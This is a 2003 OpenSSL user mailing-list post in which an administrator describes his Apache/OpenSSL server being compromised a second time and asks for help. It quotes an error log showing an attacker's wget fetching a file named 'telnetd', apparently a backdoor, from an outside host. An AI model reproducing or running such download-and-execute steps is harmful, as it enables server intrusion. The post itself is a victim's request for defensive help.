0.9.7c Vulnerability??

[Fred Merritt]

Our site has recently been successfully attacked twice.  The first time 
we probably deserved it, as we running on old software, and hadn't been 
fixing vulnerabilities regularly.  So we reformatted the disks, 
installed Apache 1.3.29, PHP 4.3.4, and Openssl 0.9.7c, and patched the 
kernel bug that let the swines get root after the first time they got in.

Feeling more secure, we brought Apache up, and carried with business.  
Just a couple of hours after bringing up Apache, we got the following 
entries in the main server error log:

[Sat Dec 20 17:49:24 2003] [notice] Apache/1.3.29 (Unix) PHP/4.3.4 
mod_ssl/2.8.16 OpenSSL/0.9.7c configured -- resuming normal operations
[Sat Dec 20 17:49:24 2003] [notice] Accept mutex: sysvsem (Default: sysvsem)
--20:41:46--  http://www.viperhaxu.hpg.com.br/telnetd
          => `telnetd'
Resolving www.viperhaxu.hpg.com.br... done.
Connecting to www.viperhaxu.hpg.com.br[200.226.137.9]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.viperhaxu.hpg.ig.com.br/telnetd [following]
--20:41:47--  http://www.viperhaxu.hpg.ig.com.br/telnetd
          => `telnetd'
Resolving www.viperhaxu.hpg.ig.com.br... done.
Connecting to www.viperhaxu.hpg.ig.com.br[200.226.137.12]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 170,613 [text/plain]

   0K .......... .......... .......... .......... .......... 30%   
52.74 KB/s
  50K .......... .......... .......... .......... .......... 60%  
187.27 KB/s
 100K .......... .......... .......... .......... .......... 90%   
49.55 KB/s
 150K .......... ......                                     100%  
156.74 KB/s

20:41:50 (71.51 KB/s) - `telnetd' saved [170613/170613]
<snip>
Which was more or less the same way the first attack started.  Since all 
the information I can find on the net seems to say 0.9.7c fixes the 
known vulnerabilities, and even the hackers themselves seem to think 
they are only capable of breaking 0.9.6x versions(they are very proud, 
they publish their photographs on the net, and give detailed 
instructions on how to exploit), I am wondering  if  we somehow didn't 
do the build correctly.  Apache certainly seems to think the build was 
o.k. from the log, and the libssl.so that was loaded has 0.9.7c 
everywhere inside it.

I am ready to restart Apache once again, but would be grateful on any 
advice as to the best way to proceed - I really don't feel like 
reinstalling from scratch a 3rd time.

Best regards. . . Fred.



______________________________________________________________________
OpenSSL Project                                 http://www.openssl.org
User Support Mailing List                    [EMAIL PROTECTED]
Automated List Manager                           [EMAIL PROTECTED]